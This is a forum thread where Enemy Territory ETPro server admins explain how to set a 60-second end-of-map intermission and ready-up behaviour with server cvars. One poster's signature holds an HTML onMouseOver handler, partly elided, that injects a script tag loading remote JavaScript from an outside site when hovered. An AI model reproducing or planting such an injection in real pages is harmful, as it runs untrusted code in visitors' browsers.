60 sec. @Mapchainsh

Discussion for Admins of ETPro/BayonET servers.
If you don't run a server, please don't post here...

Moderators: Forum moderators, developers

markus

60 sec. @Mapchainsh

Post by markus »

Hello,

We have 2 ET Servers. Both ET v1.02 ETPro v 2.0.5.

Tere ist following Problem:

In ETMain there are 60 sec. for Chat & Stats when the Map change in a Campain. In ETPro there are only some seconds. Usually 3 - 6 or so. How can i get there 60 sec too? I can`t find it in example.cfg or Adminguide:(

Sry for my bad english.

Markus
Rain

Post by Rain »

The 'ready' button works right in etpro (it requires everyone, including spectators and people who haven't finished connecting yet, to hit ready in vanilla ET), and it also obeys match_readypercent--that is, if match_readypercent is 50, only 50% of the players will need to hit ready at the end of the round before it'll load the next map.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
DG

Post by DG »

erm "works right in etpro" depends on your point of view. It works right if you want to have players having to readyup on map load, but it definately doesnt if you dont.

IMHO: The F3 ready is there for players who are ready to start the game, which includes having loaded up the map and so on. The ready at the intermission is there to skip the intermission wait. Two different functions, so therefore they shouldnt be based on the one cvar.

I dont want players to have to readyup at the round start, but I do want the end-round delay to last 30 seconds OR until everyone has pressed the ready button. "Everyone" includes spectators, who might be interested in the stats, although a minor preferance would be to not include people still connecting.

In short, please keep the end-round ready button irrelevant to match_readypercent, I've spent rather a long time digging through scripts trying to fix what I thought was a script error somewhere. I for one consider this a bug, a non-fix for a non-problem; b_intermission_readypercent or something would be fine though.
Badhabit

Post by Badhabit »

Code: Select all

set g_doWarmup "0"  

b_intermissiontime 60 
Defines the duration of the end-round intermission, in seconds.
{Zer0}'s House of Torment 67.19.67.118:27960
{Zer0}'s RTCW server 67.19.67.119:27960
Now Lets Go Kick Some ASS
And thats an Order.
DG

Post by DG »

aha
I blame Rain for not mentioning that tbhtbhtbh.
=FF=im2good4u

Post by =FF=im2good4u »

but I do want the end-round delay to last 30 seconds OR until everyone has pressed the ready button
i thoguh this could easyly be cheated whit /readyteam
DG

Post by DG »

set team_nocontrols "1" 
1 prevents "readyteam" etc
markus

Post by markus »

DG wrote: IMHO: The F3 ready is there for players who are ready to start the game, which includes having loaded up the map and so on. The ready at the intermission is there to skip the intermission wait. Two different functions, so therefore they shouldnt be based on the one cvar.

I don`t mead the F3 Ready. But there are some more things i want :(

- In the First Time i want 60 sec. wait or everyboby (100%) will press ready. Ok it will be great when u can change this time but i dont need yet.

- In the second time - when the Map is loaded - i dont need this stupid F3 on Public settings. There are always stupidos not pressing F3 so i shut them off. Only want my 60 sec warum there. 60 sec warmup works yet.

Two different functions, so therefore they shouldnt be based on the one cvar. <--- Think also this is stupid.

Markus
DG

Post by DG »

markus read the posts above :oops: try

set g_doWarmup "0"
set match_readypercent "99"
set b_intermissiontime "60"
markus

Post by markus »

OK thx

Markus

PS: i have read but usually not realy understand :(